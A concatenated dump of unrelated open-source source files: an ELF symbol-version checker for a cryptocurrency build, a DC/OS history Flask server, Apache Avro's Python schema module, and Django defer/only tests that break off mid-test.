experiment_type = CM.ExperimentType("exp", "cat")
reservation = CM.Reservation("hola", "{}", "{}", "{}", None)
reservation.experiment_type = experiment_type
pq_waiting_reservation = PQSM.WaitingReservation(resource_type, reservation.id, 50, 1, True)
repr(pq_waiting_reservation) # No exception is raised
def suite():
return unittest.makeSuite(PriorityQueueSchedulerModelTestCase)
if __name__ == '__main__':
unittest.main()
| bsd-2-clause |
presidentielcoin/presidentielcoin | contrib/devtools/symbol-check.py | 1 | 6218 | #!/usr/bin/python2
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
A script to check that the (Linux) executables produced by gitian only contain
allowed gcc, glibc and libstdc++ version symbols. This makes sure they are
still compatible with the minimum supported Linux distribution versions.
Example usage:
find ../gitian-builder/build -type f -executable | xargs python contrib/devtools/symbol-check.py
'''
from __future__ import division, print_function, unicode_literals
import subprocess
import re
import sys
import os
# Debian 6.0.9 (Squeeze) has:
#
# - g++ version 4.4.5 (https://packages.debian.org/search?suite=default§ion=all&arch=any&searchon=names&keywords=g%2B%2B)
# - libc version 2.11.3 (https://packages.debian.org/search?suite=default§ion=all&arch=any&searchon=names&keywords=libc6)
# - libstdc++ version 4.4.5 (https://packages.debian.org/search?suite=default§ion=all&arch=any&searchon=names&keywords=libstdc%2B%2B6)
#
# Ubuntu 10.04.4 (Lucid Lynx) has:
#
# - g++ version 4.4.3 (http://packages.ubuntu.com/search?keywords=g%2B%2B&searchon=names&suite=lucid§ion=all)
# - libc version 2.11.1 (http://packages.ubuntu.com/search?keywords=libc6&searchon=names&suite=lucid§ion=all)
# - libstdc++ version 4.4.3 (http://packages.ubuntu.com/search?suite=lucid§ion=all&arch=any&keywords=libstdc%2B%2B&searchon=names)
#
# Taking the minimum of these as our target.
#
# According to GNU ABI document (http://gcc.gnu.org/onlinedocs/libstdc++/manual/abi.html) this corresponds to:
# GCC 4.4.0: GCC_4.4.0
# GCC 4.4.2: GLIBCXX_3.4.13, CXXABI_1.3.3
# (glibc) GLIBC_2_11
#
MAX_VERSIONS = {
'GCC': (4,4,0),
'CXXABI': (1,3,3),
'GLIBCXX': (3,4,13),
'GLIBC': (2,11)
}
# See here for a description of _IO_stdin_used:
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=634261#109
# Ignore symbols that are exported as part of every executable
IGNORE_EXPORTS = {
b'_edata', b'_end', b'_init', b'__bss_start', b'_fini', b'_IO_stdin_used'
}
READELF_CMD = os.getenv('READELF', '/usr/bin/readelf')
CPPFILT_CMD = os.getenv('CPPFILT', '/usr/bin/c++filt')
# Allowed NEEDED libraries
ALLOWED_LIBRARIES = {
# presidentielcoind and presidentielcoin-qt
b'libgcc_s.so.1', # GCC base support
b'libc.so.6', # C library
b'libpthread.so.0', # threading
b'libanl.so.1', # DNS resolve
b'libm.so.6', # math library
b'librt.so.1', # real-time (clock)
b'ld-linux-x86-64.so.2', # 64-bit dynamic linker
b'ld-linux.so.2', # 32-bit dynamic linker
# presidentielcoin-qt only
b'libX11-xcb.so.1', # part of X11
b'libX11.so.6', # part of X11
b'libxcb.so.1', # part of X11
b'libfontconfig.so.1', # font support
b'libfreetype.so.6', # font parsing
b'libdl.so.2' # programming interface to dynamic linker
}
class CPPFilt(object):
'''
Demangle C++ symbol names.
Use a pipe to the 'c++filt' command.
'''
def __init__(self):
self.proc = subprocess.Popen(CPPFILT_CMD, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
def __call__(self, mangled):
self.proc.stdin.write(mangled + b'\n')
self.proc.stdin.flush()
return self.proc.stdout.readline().rstrip()
def close(self):
self.proc.stdin.close()
self.proc.stdout.close()
self.proc.wait()
def read_symbols(executable, imports=True):
'''
Parse an ELF executable and return a list of (symbol,version) tuples
for dynamic, imported symbols.
'''
p = subprocess.Popen([READELF_CMD, '--dyn-syms', '-W', executable], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
(stdout, stderr) = p.communicate()
if p.returncode:
raise IOError('Could not read symbols for %s: %s' % (executable, stderr.strip()))
syms = []
for line in stdout.split(b'\n'):
line = line.split()
if len(line)>7 and re.match(b'[0-9]+:$', line[0]):
(sym, _, version) = line[7].partition(b'@')
is_import = line[6] == b'UND'
if version.startswith(b'@'):
version = version[1:]
if is_import == imports:
syms.append((sym, version))
return syms
def check_version(max_versions, version):
if b'_' in version:
(lib, _, ver) = version.rpartition(b'_')
else:
lib = version
ver = '0'
ver = tuple([int(x) for x in ver.split(b'.')])
if not lib in max_versions:
return False
return ver <= max_versions[lib]
def read_libraries(filename):
p = subprocess.Popen([READELF_CMD, '-d', '-W', filename], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
(stdout, stderr) = p.communicate()
if p.returncode:
raise IOError('Error opening file')
libraries = []
for line in stdout.split(b'\n'):
tokens = line.split()
if len(tokens)>2 and tokens[1] == b'(NEEDED)':
match = re.match(b'^Shared library: \[(.*)\]$', b' '.join(tokens[2:]))
if match:
libraries.append(match.group(1))
else:
raise ValueError('Unparseable (NEEDED) specification')
return libraries
if __name__ == '__main__':
cppfilt = CPPFilt()
retval = 0
for filename in sys.argv[1:]:
# Check imported symbols
for sym,version in read_symbols(filename, True):
if version and not check_version(MAX_VERSIONS, version):
print('%s: symbol %s from unsupported version %s' % (filename, cppfilt(sym).decode('utf-8'), version.decode('utf-8')))
retval = 1
# Check exported symbols
for sym,version in read_symbols(filename, False):
if sym in IGNORE_EXPORTS:
continue
print('%s: export of symbol %s not allowed' % (filename, cppfilt(sym).decode('utf-8')))
retval = 1
# Check dependency libraries
for library_name in read_libraries(filename):
if library_name not in ALLOWED_LIBRARIES:
print('%s: NEEDED library %s is not allowed' % (filename, library_name.decode('utf-8')))
retval = 1
exit(retval)
| mit |
asridharan/dcos | packages/dcos-history/extra/history/server_util.py | 7 | 3183 | import logging
import os
import sys
import threading
from flask import Flask, Response
from flask.ext.compress import Compress
from history.statebuffer import BufferCollection, BufferUpdater
compress = Compress()
state_buffer = None
log = logging.getLogger(__name__)
add_headers_cb = None
try:
import dcos_auth_python
log.info('dcos_auth_python module detected; applying settings')
global add_headers_cb
add_headers_cb = dcos_auth_python.get_auth_headers
except ImportError:
log.info('no dcos_auth_python module detected; using defaults')
def headers_cb():
"""Callback method for providing headers per request
add_headers_cb is another callback providing headers (as a dict) to update the
defaults in this method. This method can be set by adding a dcos_auth_python package
with a get_auth_headers method
"""
headers = {
"Access-Control-Allow-Credentials": "true",
"Access-Control-Allow-Headers": "accept, accept-charset, accept-encoding, " +
"accept-language, authorization, content-length, " +
"content-type, host, origin, proxy-connection, " +
"referer, user-agent, x-requested-with",
"Access-Control-Allow-Methods": "HEAD, GET, PUT, POST, PATCH, DELETE",
"Access-Control-Allow-Origin": "*",
"Access-Control-Max-Age": "86400"}
if add_headers_cb:
headers.update(add_headers_cb())
return headers
def update():
BufferUpdater(state_buffer, headers_cb).update()
update_thread = threading.Timer(2, update)
update_thread.start()
def create_app():
app = Flask(__name__)
logging.basicConfig(format='[%(levelname)s:%(asctime)s] %(message)s', level='INFO')
compress.init_app(app)
if 'HISTORY_BUFFER_DIR' not in os.environ:
sys.exit('HISTORY_BUFFER_DIR must be set!')
global state_buffer
state_buffer = BufferCollection(os.environ['HISTORY_BUFFER_DIR'])
update()
route(app)
return app
def home():
return _response_("history/last - to get the last fetched state\n" +
"history/minute - to get the state array of the last minute\n" +
"history/hour - to get the state array of the last hour\n" +
"ping - to get a pong\n")
def ping():
return _response_("pong")
def last():
return _response_(state_buffer.dump('last')[0])
def minute():
return _buffer_response_('minute')
def hour():
return _buffer_response_('hour')
def _buffer_response_(name):
return _response_("[" + ",".join(state_buffer.dump(name)) + "]")
def _response_(content):
return Response(response=content, content_type="application/json", headers=headers_cb())
def route(app):
app.add_url_rule('/', view_func=home)
app.add_url_rule('/ping', view_func=ping)
app.add_url_rule('/history/last', view_func=last)
app.add_url_rule('/history/minute', view_func=minute)
app.add_url_rule('/history/hour', view_func=hour)
def test():
# Used for unit testing
app = Flask(__name__)
route(app)
return app
| apache-2.0 |
axbaretto/beam | sdks/python/.tox/py27gcp/lib/python2.7/site-packages/avro/schema.py | 9 | 24845 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Contains the Schema classes.
A schema may be one of:
A record, mapping field names to field value data;
An error, equivalent to a record;
An enum, containing one of a small set of symbols;
An array of values, all of the same schema;
A map containing string/value pairs, each of a declared schema;
A union of other schemas;
A fixed sized binary object;
A unicode string;
A sequence of bytes;
A 32-bit signed int;
A 64-bit signed long;
A 32-bit floating-point float;
A 64-bit floating-point double;
A boolean; or
Null.
"""
try:
import json
except ImportError:
import simplejson as json
#
# Constants
#
PRIMITIVE_TYPES = (
'null',
'boolean',
'string',
'bytes',
'int',
'long',
'float',
'double',
)
NAMED_TYPES = (
'fixed',
'enum',
'record',
'error',
)
VALID_TYPES = PRIMITIVE_TYPES + NAMED_TYPES + (
'array',
'map',
'union',
'request',
'error_union'
)
SCHEMA_RESERVED_PROPS = (
'type',
'name',
'namespace',
'fields', # Record
'items', # Array
'size', # Fixed
'symbols', # Enum
'values', # Map
'doc',
)
FIELD_RESERVED_PROPS = (
'default',
'name',
'doc',
'order',
'type',
)
VALID_FIELD_SORT_ORDERS = (
'ascending',
'descending',
'ignore',
)
#
# Exceptions
#
class AvroException(Exception):
pass
class SchemaParseException(AvroException):
pass
#
# Base Classes
#
class Schema(object):
"""Base class for all Schema classes."""
def __init__(self, type, other_props=None):
# Ensure valid ctor args
if not isinstance(type, basestring):
fail_msg = 'Schema type must be a string.'
raise SchemaParseException(fail_msg)
elif type not in VALID_TYPES:
fail_msg = '%s is not a valid type.' % type
raise SchemaParseException(fail_msg)
# add members
if not hasattr(self, '_props'): self._props = {}
self.set_prop('type', type)
self.type = type
self._props.update(other_props or {})
# Read-only properties dict. Printing schemas
# creates JSON properties directly from this dict.
props = property(lambda self: self._props)
# Read-only property dict. Non-reserved properties
other_props = property(lambda self: get_other_props(self._props, SCHEMA_RESERVED_PROPS),
doc="dictionary of non-reserved properties")
# utility functions to manipulate properties dict
def get_prop(self, key):
return self._props.get(key)
def set_prop(self, key, value):
self._props[key] = value
def __str__(self):
return json.dumps(self.to_json())
def to_json(self, names):
"""
Converts the schema object into its AVRO specification representation.
Schema types that have names (records, enums, and fixed) must
be aware of not re-defining schemas that are already listed
in the parameter names.
"""
raise Exception("Must be implemented by subclasses.")
class Name(object):
"""Class to describe Avro name."""
def __init__(self, name_attr, space_attr, default_space):
"""
Formulate full name according to the specification.
@arg name_attr: name value read in schema or None.
@arg space_attr: namespace value read in schema or None.
@ard default_space: the current default space or None.
"""
# Ensure valid ctor args
if not (isinstance(name_attr, basestring) or (name_attr is None)):
fail_msg = 'Name must be non-empty string or None.'
raise SchemaParseException(fail_msg)
elif name_attr == "":
fail_msg = 'Name must be non-empty string or None.'
raise SchemaParseException(fail_msg)
if not (isinstance(space_attr, basestring) or (space_attr is None)):
fail_msg = 'Space must be non-empty string or None.'
raise SchemaParseException(fail_msg)
elif name_attr == "":
fail_msg = 'Space must be non-empty string or None.'
raise SchemaParseException(fail_msg)
if not (isinstance(default_space, basestring) or (default_space is None)):
fail_msg = 'Default space must be non-empty string or None.'
raise SchemaParseException(fail_msg)
elif name_attr == "":
fail_msg = 'Default must be non-empty string or None.'
raise SchemaParseException(fail_msg)
self._full = None;
if name_attr is None or name_attr == "":
return;
if (name_attr.find('.') < 0):
if (space_attr is not None) and (space_attr != ""):
self._full = "%s.%s" % (space_attr, name_attr)
else:
if (default_space is not None) and (default_space != ""):
self._full = "%s.%s" % (default_space, name_attr)
else:
self._full = name_attr
else:
self._full = name_attr
def __eq__(self, other):
if not isinstance(other, Name):
return False
return (self.fullname == other.fullname)
fullname = property(lambda self: self._full)
def get_space(self):
"""Back out a namespace from full name."""
if self._full is None:
return None
if (self._full.find('.') > 0):
return self._full.rsplit(".", 1)[0]
else:
return ""
class Names(object):
"""Track name set and default namespace during parsing."""
def __init__(self, default_namespace=None):
self.names = {}
self.default_namespace = default_namespace
def has_name(self, name_attr, space_attr):
test = Name(name_attr, space_attr, self.default_namespace).fullname
return self.names.has_key(test)
def get_name(self, name_attr, space_attr):
test = Name(name_attr, space_attr, self.default_namespace).fullname
if not self.names.has_key(test):
return None
return self.names[test]
def prune_namespace(self, properties):
"""given a properties, return properties with namespace removed if
it matches the own default namespace"""
if self.default_namespace is None:
# I have no default -- no change
return properties
if 'namespace' not in properties:
# he has no namespace - no change
return properties
if properties['namespace'] != self.default_namespace:
# we're different - leave his stuff alone
return properties
# we each have a namespace and it's redundant. delete his.
prunable = properties.copy()
del(prunable['namespace'])
return prunable
def add_name(self, name_attr, space_attr, new_schema):
"""
Add a new schema object to the name set.
@arg name_attr: name value read in schema
@arg space_attr: namespace value read in schema.
@return: the Name that was just added.
"""
to_add = Name(name_attr, space_attr, self.default_namespace)
if to_add.fullname in VALID_TYPES:
fail_msg = '%s is a reserved type name.' % to_add.fullname
raise SchemaParseException(fail_msg)
elif self.names.has_key(to_add.fullname):
fail_msg = 'The name "%s" is already in use.' % to_add.fullname
raise SchemaParseException(fail_msg)
self.names[to_add.fullname] = new_schema
return to_add
class NamedSchema(Schema):
"""Named Schemas specified in NAMED_TYPES."""
def __init__(self, type, name, namespace=None, names=None, other_props=None):
# Ensure valid ctor args
if not name:
fail_msg = 'Named Schemas must have a non-empty name.'
raise SchemaParseException(fail_msg)
elif not isinstance(name, basestring):
fail_msg = 'The name property must be a string.'
raise SchemaParseException(fail_msg)
elif namespace is not None and not isinstance(namespace, basestring):
fail_msg = 'The namespace property must be a string.'
raise SchemaParseException(fail_msg)
# Call parent ctor
Schema.__init__(self, type, other_props)
# Add class members
new_name = names.add_name(name, namespace, self)
# Store name and namespace as they were read in origin schema
self.set_prop('name', name)
if namespace is not None:
self.set_prop('namespace', new_name.get_space())
# Store full name as calculated from name, namespace
self._fullname = new_name.fullname
def name_ref(self, names):
if self.namespace == names.default_namespace:
return self.name
else:
return self.fullname
# read-only properties
name = property(lambda self: self.get_prop('name'))
namespace = property(lambda self: self.get_prop('namespace'))
fullname = property(lambda self: self._fullname)
class Field(object):
def __init__(self, type, name, has_default, default=None,
order=None,names=None, doc=None, other_props=None):
# Ensure valid ctor args
if not name:
fail_msg = 'Fields must have a non-empty name.'
raise SchemaParseException(fail_msg)
elif not isinstance(name, basestring):
fail_msg = 'The name property must be a string.'
raise SchemaParseException(fail_msg)
elif order is not None and order not in VALID_FIELD_SORT_ORDERS:
fail_msg = 'The order property %s is not valid.' % order
raise SchemaParseException(fail_msg)
# add members
self._props = {}
self._has_default = has_default
self._props.update(other_props or {})
if (isinstance(type, basestring) and names is not None
and names.has_name(type, None)):
type_schema = names.get_name(type, None)
else:
try:
type_schema = make_avsc_object(type, names)
except Exception, e:
fail_msg = 'Type property "%s" not a valid Avro schema: %s' % (type, e)
raise SchemaParseException(fail_msg)
self.set_prop('type', type_schema)
self.set_prop('name', name)
self.type = type_schema
self.name = name
# TODO(hammer): check to ensure default is valid
if has_default: self.set_prop('default', default)
if order is not None: self.set_prop('order', order)
if doc is not None: self.set_prop('doc', doc)
# read-only properties
default = property(lambda self: self.get_prop('default'))
has_default = property(lambda self: self._has_default)
order = property(lambda self: self.get_prop('order'))
doc = property(lambda self: self.get_prop('doc'))
props = property(lambda self: self._props)
# Read-only property dict. Non-reserved properties
other_props = property(lambda self: get_other_props(self._props, FIELD_RESERVED_PROPS),
doc="dictionary of non-reserved properties")
# utility functions to manipulate properties dict
def get_prop(self, key):
return self._props.get(key)
def set_prop(self, key, value):
self._props[key] = value
def __str__(self):
return json.dumps(self.to_json())
def to_json(self, names=None):
if names is None:
names = Names()
to_dump = self.props.copy()
to_dump['type'] = self.type.to_json(names)
return to_dump
def __eq__(self, that):
to_cmp = json.loads(str(self))
return to_cmp == json.loads(str(that))
#
# Primitive Types
#
class PrimitiveSchema(Schema):
"""Valid primitive types are in PRIMITIVE_TYPES."""
def __init__(self, type, other_props=None):
# Ensure valid ctor args
if type not in PRIMITIVE_TYPES:
raise AvroException("%s is not a valid primitive type." % type)
# Call parent ctor
Schema.__init__(self, type, other_props=other_props)
self.fullname = type
def to_json(self, names=None):
if len(self.props) == 1:
return self.fullname
else:
return self.props
def __eq__(self, that):
return self.props == that.props
#
# Complex Types (non-recursive)
#
class FixedSchema(NamedSchema):
def __init__(self, name, namespace, size, names=None, other_props=None):
# Ensure valid ctor args
if not isinstance(size, int):
fail_msg = 'Fixed Schema requires a valid integer for size property.'
raise AvroException(fail_msg)
# Call parent ctor
NamedSchema.__init__(self, 'fixed', name, namespace, names, other_props)
# Add class members
self.set_prop('size', size)
# read-only properties
size = property(lambda self: self.get_prop('size'))
def to_json(self, names=None):
if names is None:
names = Names()
if self.fullname in names.names:
return self.name_ref(names)
else:
names.names[self.fullname] = self
return names.prune_namespace(self.props)
def __eq__(self, that):
return self.props == that.props
class EnumSchema(NamedSchema):
def __init__(self, name, namespace, symbols, names=None, doc=None, other_props=None):
# Ensure valid ctor args
if not isinstance(symbols, list):
fail_msg = 'Enum Schema requires a JSON array for the symbols property.'
raise AvroException(fail_msg)
elif False in [isinstance(s, basestring) for s in symbols]:
fail_msg = 'Enum Schema requires all symbols to be JSON strings.'
raise AvroException(fail_msg)
elif len(set(symbols)) < len(symbols):
fail_msg = 'Duplicate symbol: %s' % symbols
raise AvroException(fail_msg)
# Call parent ctor
NamedSchema.__init__(self, 'enum', name, namespace, names, other_props)
# Add class members
self.set_prop('symbols', symbols)
if doc is not None: self.set_prop('doc', doc)
# read-only properties
symbols = property(lambda self: self.get_prop('symbols'))
doc = property(lambda self: self.get_prop('doc'))
def to_json(self, names=None):
if names is None:
names = Names()
if self.fullname in names.names:
return self.name_ref(names)
else:
names.names[self.fullname] = self
return names.prune_namespace(self.props)
def __eq__(self, that):
return self.props == that.props
#
# Complex Types (recursive)
#
class ArraySchema(Schema):
def __init__(self, items, names=None, other_props=None):
# Call parent ctor
Schema.__init__(self, 'array', other_props)
# Add class members
if isinstance(items, basestring) and names.has_name(items, None):
items_schema = names.get_name(items, None)
else:
try:
items_schema = make_avsc_object(items, names)
except SchemaParseException, e:
fail_msg = 'Items schema (%s) not a valid Avro schema: %s (known names: %s)' % (items, e, names.names.keys())
raise SchemaParseException(fail_msg)
self.set_prop('items', items_schema)
# read-only properties
items = property(lambda self: self.get_prop('items'))
def to_json(self, names=None):
if names is None:
names = Names()
to_dump = self.props.copy()
item_schema = self.get_prop('items')
to_dump['items'] = item_schema.to_json(names)
return to_dump
def __eq__(self, that):
to_cmp = json.loads(str(self))
return to_cmp == json.loads(str(that))
class MapSchema(Schema):
def __init__(self, values, names=None, other_props=None):
# Call parent ctor
Schema.__init__(self, 'map',other_props)
# Add class members
if isinstance(values, basestring) and names.has_name(values, None):
values_schema = names.get_name(values, None)
else:
try:
values_schema = make_avsc_object(values, names)
except:
fail_msg = 'Values schema not a valid Avro schema.'
raise SchemaParseException(fail_msg)
self.set_prop('values', values_schema)
# read-only properties
values = property(lambda self: self.get_prop('values'))
def to_json(self, names=None):
if names is None:
names = Names()
to_dump = self.props.copy()
to_dump['values'] = self.get_prop('values').to_json(names)
return to_dump
def __eq__(self, that):
to_cmp = json.loads(str(self))
return to_cmp == json.loads(str(that))
class UnionSchema(Schema):
"""
names is a dictionary of schema objects
"""
def __init__(self, schemas, names=None):
# Ensure valid ctor args
if not isinstance(schemas, list):
fail_msg = 'Union schema requires a list of schemas.'
raise SchemaParseException(fail_msg)
# Call parent ctor
Schema.__init__(self, 'union')
# Add class members
schema_objects = []
for schema in schemas:
if isinstance(schema, basestring) and names.has_name(schema, None):
new_schema = names.get_name(schema, None)
else:
try:
new_schema = make_avsc_object(schema, names)
except Exception, e:
raise SchemaParseException('Union item must be a valid Avro schema: %s' % str(e))
# check the new schema
if (new_schema.type in VALID_TYPES and new_schema.type not in NAMED_TYPES
and new_schema.type in [schema.type for schema in schema_objects]):
raise SchemaParseException('%s type already in Union' % new_schema.type)
elif new_schema.type == 'union':
raise SchemaParseException('Unions cannot contain other unions.')
else:
schema_objects.append(new_schema)
self._schemas = schema_objects
# read-only properties
schemas = property(lambda self: self._schemas)
def to_json(self, names=None):
if names is None:
names = Names()
to_dump = []
for schema in self.schemas:
to_dump.append(schema.to_json(names))
return to_dump
def __eq__(self, that):
to_cmp = json.loads(str(self))
return to_cmp == json.loads(str(that))
class ErrorUnionSchema(UnionSchema):
def __init__(self, schemas, names=None):
# Prepend "string" to handle system errors
UnionSchema.__init__(self, ['string'] + schemas, names)
def to_json(self, names=None):
if names is None:
names = Names()
to_dump = []
for schema in self.schemas:
# Don't print the system error schema
if schema.type == 'string': continue
to_dump.append(schema.to_json(names))
return to_dump
class RecordSchema(NamedSchema):
@staticmethod
def make_field_objects(field_data, names):
"""We're going to need to make message parameters too."""
field_objects = []
field_names = []
for i, field in enumerate(field_data):
if hasattr(field, 'get') and callable(field.get):
type = field.get('type')
name = field.get('name')
# null values can have a default value of None
has_default = False
default = None
if field.has_key('default'):
has_default = True
default = field.get('default')
order = field.get('order')
doc = field.get('doc')
other_props = get_other_props(field, FIELD_RESERVED_PROPS)
new_field = Field(type, name, has_default, default, order, names, doc,
other_props)
# make sure field name has not been used yet
if new_field.name in field_names:
fail_msg = 'Field name %s already in use.' % new_field.name
raise SchemaParseException(fail_msg)
field_names.append(new_field.name)
else:
raise SchemaParseException('Not a valid field: %s' % field)
field_objects.append(new_field)
return field_objects
def __init__(self, name, namespace, fields, names=None, schema_type='record',
doc=None, other_props=None):
# Ensure valid ctor args
if fields is None:
fail_msg = 'Record schema requires a non-empty fields property.'
raise SchemaParseException(fail_msg)
elif not isinstance(fields, list):
fail_msg = 'Fields property must be a list of Avro schemas.'
raise SchemaParseException(fail_msg)
# Call parent ctor (adds own name to namespace, too)
if schema_type == 'request':
Schema.__init__(self, schema_type, other_props)
else:
NamedSchema.__init__(self, schema_type, name, namespace, names,
other_props)
if schema_type == 'record':
old_default = names.default_namespace
names.default_namespace = Name(name, namespace,
names.default_namespace).get_space()
# Add class members
field_objects = RecordSchema.make_field_objects(fields, names)
self.set_prop('fields', field_objects)
if doc is not None: self.set_prop('doc', doc)
if schema_type == 'record':
names.default_namespace = old_default
# read-only properties
fields = property(lambda self: self.get_prop('fields'))
doc = property(lambda self: self.get_prop('doc'))
@property
def fields_dict(self):
fields_dict = {}
for field in self.fields:
fields_dict[field.name] = field
return fields_dict
def to_json(self, names=None):
if names is None:
names = Names()
# Request records don't have names
if self.type == 'request':
return [ f.to_json(names) for f in self.fields ]
if self.fullname in names.names:
return self.name_ref(names)
else:
names.names[self.fullname] = self
to_dump = names.prune_namespace(self.props.copy())
to_dump['fields'] = [ f.to_json(names) for f in self.fields ]
return to_dump
def __eq__(self, that):
to_cmp = json.loads(str(self))
return to_cmp == json.loads(str(that))
#
# Module Methods
#
def get_other_props(all_props,reserved_props):
"""
Retrieve the non-reserved properties from a dictionary of properties
@args reserved_props: The set of reserved properties to exclude
"""
if hasattr(all_props, 'items') and callable(all_props.items):
return dict([(k,v) for (k,v) in all_props.items() if k not in
reserved_props ])
def make_avsc_object(json_data, names=None):
"""
Build Avro Schema from data parsed out of JSON string.
@arg names: A Name object (tracks seen names and default space)
"""
if names == None:
names = Names()
# JSON object (non-union)
if hasattr(json_data, 'get') and callable(json_data.get):
type = json_data.get('type')
other_props = get_other_props(json_data, SCHEMA_RESERVED_PROPS)
if type in PRIMITIVE_TYPES:
return PrimitiveSchema(type, other_props)
elif type in NAMED_TYPES:
name = json_data.get('name')
namespace = json_data.get('namespace', names.default_namespace)
if type == 'fixed':
size = json_data.get('size')
return FixedSchema(name, namespace, size, names, other_props)
elif type == 'enum':
symbols = json_data.get('symbols')
doc = json_data.get('doc')
return EnumSchema(name, namespace, symbols, names, doc, other_props)
elif type in ['record', 'error']:
fields = json_data.get('fields')
doc = json_data.get('doc')
return RecordSchema(name, namespace, fields, names, type, doc, other_props)
else:
raise SchemaParseException('Unknown Named Type: %s' % type)
elif type in VALID_TYPES:
if type == 'array':
items = json_data.get('items')
return ArraySchema(items, names, other_props)
elif type == 'map':
values = json_data.get('values')
return MapSchema(values, names, other_props)
elif type == 'error_union':
declared_errors = json_data.get('declared_errors')
return ErrorUnionSchema(declared_errors, names)
else:
raise SchemaParseException('Unknown Valid Type: %s' % type)
elif type is None:
raise SchemaParseException('No "type" property: %s' % json_data)
else:
raise SchemaParseException('Undefined type: %s' % type)
# JSON array (union)
elif isinstance(json_data, list):
return UnionSchema(json_data, names)
# JSON string (primitive)
elif json_data in PRIMITIVE_TYPES:
return PrimitiveSchema(json_data)
# not for us!
else:
fail_msg = "Could not make an Avro Schema object from %s." % json_data
raise SchemaParseException(fail_msg)
# TODO(hammer): make method for reading from a file?
def parse(json_string):
"""Constructs the Schema from the JSON text."""
# parse the JSON
try:
json_data = json.loads(json_string)
except Exception, e:
import sys
raise SchemaParseException('Error parsing JSON: %s, error = %s'
% (json_string, e)), None, sys.exc_info()[2]
# Initialize the names object
names = Names()
# construct the Avro Schema object
return make_avsc_object(json_data, names)
| apache-2.0 |
overtherain/scriptfile | software/googleAppEngine/lib/django_1_4/tests/modeltests/defer/tests.py | 33 | 6226 | from __future__ import absolute_import
from django.db.models.query_utils import DeferredAttribute
from django.test import TestCase
from .models import Secondary, Primary, Child, BigChild, ChildProxy
class DeferTests(TestCase):
def assert_delayed(self, obj, num):
count = 0
for field in obj._meta.fields:
if isinstance(obj.__class__.__dict__.get(field.attname),
DeferredAttribute):
count += 1
self.assertEqual(count, num)
def test_defer(self):
# To all outward appearances, instances with deferred fields look the
# same as normal instances when we examine attribute values. Therefore
# we test for the number of deferred fields on returned instances (by
# poking at the internals), as a way to observe what is going on.
s1 = Secondary.objects.create(first="x1", second="y1")
p1 = Primary.objects.create(name="p1", value="xx", related=s1)
qs = Primary.objects.all()
self.assert_delayed(qs.defer("name")[0], 1)
self.assert_delayed(qs.only("name")[0], 2)
self.assert_delayed(qs.defer("related__first")[0], 0)
# Using 'pk' with only() should result in 3 deferred fields, namely all
# of them except the model's primary key see #15494
self.assert_delayed(qs.only("pk")[0], 3)
obj = qs.select_related().only("related__first")[0]
self.assert_delayed(obj, 2)
self.assertEqual(obj.related_id, s1.pk)
# You can use 'pk' with reverse foreign key lookups.
self.assert_delayed(s1.primary_set.all().only('pk')[0], 3)
self.assert_delayed(qs.defer("name").extra(select={"a": 1})[0], 1)
self.assert_delayed(qs.extra(select={"a": 1}).defer("name")[0], 1)
self.assert_delayed(qs.defer("name").defer("value")[0], 2)
self.assert_delayed(qs.only("name").only("value")[0], 2)
self.assert_delayed(qs.only("name").defer("value")[0], 2)
self.assert_delayed(qs.only("name", "value").defer("value")[0], 2)
self.assert_delayed(qs.defer("name").only("value")[0], 2)
obj = qs.only()[0]
self.assert_delayed(qs.defer(None)[0], 0)
self.assert_delayed(qs.only("name").defer(None)[0], 0)
# User values() won't defer anything (you get the full list of
# dictionaries back), but it still works.
self.assertEqual(qs.defer("name").values()[0], {
"id": p1.id,
"name": "p1",
"value": "xx",
"related_id": s1.id,
})
self.assertEqual(qs.only("name").values()[0], {
"id": p1.id,
"name": "p1",
"value": "xx",
"related_id": s1.id,
})
# Using defer() and only() with get() is also valid.
self.assert_delayed(qs.defer("name").get(pk=p1.pk), 1)
self.assert_delayed(qs.only("name").get(pk=p1.pk), 2)
# DOES THIS WORK?
self.assert_delayed(qs.only("name").select_related("related")[0], 1)
self.assert_delayed(qs.defer("related").select_related("related")[0], 0)
# Saving models with deferred fields is possible (but inefficient,
# since every field has to be retrieved first).
obj = Primary.objects.defer("value").get(name="p1")
obj.name = "a new name"
obj.save()
self.assertQuerysetEqual(
Primary.objects.all(), [
"a new name",
],
lambda p: p.name
)
# Regression for #10572 - A subclass with no extra fields can defer
# fields from the base class
Child.objects.create(name="c1", value="foo", related=s1)
# You can defer a field on a baseclass when the subclass has no fields
obj = Child.objects.defer("value").get(name="c1")
self.assert_delayed(obj, 1)
self.assertEqual(obj.name, "c1")
self.assertEqual(obj.value, "foo")
obj.name = "c2"
obj.save()
# You can retrive a single column on a base class with no fields
obj = Child.objects.only("name").get(name="c2")
self.assert_delayed(obj, 3)
self.assertEqual(obj.name, "c2")
self.assertEqual(obj.value, "foo")
obj.name = "cc"
obj.save()
BigChild.objects.create(name="b1", value="foo", related=s1, other="bar")
# You can defer a field on a baseclass
obj = BigChild.objects.defer("value").get(name="b1")
self.assert_delayed(obj, 1)
self.assertEqual(obj.name, "b1")
self.assertEqual(obj.value, "foo")
self.assertEqual(obj.other, "bar")
obj.name = "b2"
obj.save()
# You can defer a field on a subclass
obj = BigChild.objects.defer("other").get(name="b2")
self.assert_delayed(obj, 1)
self.assertEqual(obj.name, "b2")
self.assertEqual(obj.value, "foo")
self.assertEqual(obj.other, "bar")
obj.name = "b3"
obj.save()
# You can retrieve a single field on a baseclass
obj = BigChild.objects.only("name").get(name="b3")
self.assert_delayed(obj, 4)
self.assertEqual(obj.name, "b3")
self.assertEqual(obj.value, "foo")
self.assertEqual(obj.other, "bar")
obj.name = "b4"
obj.save()
# You can retrieve a single field on a baseclass
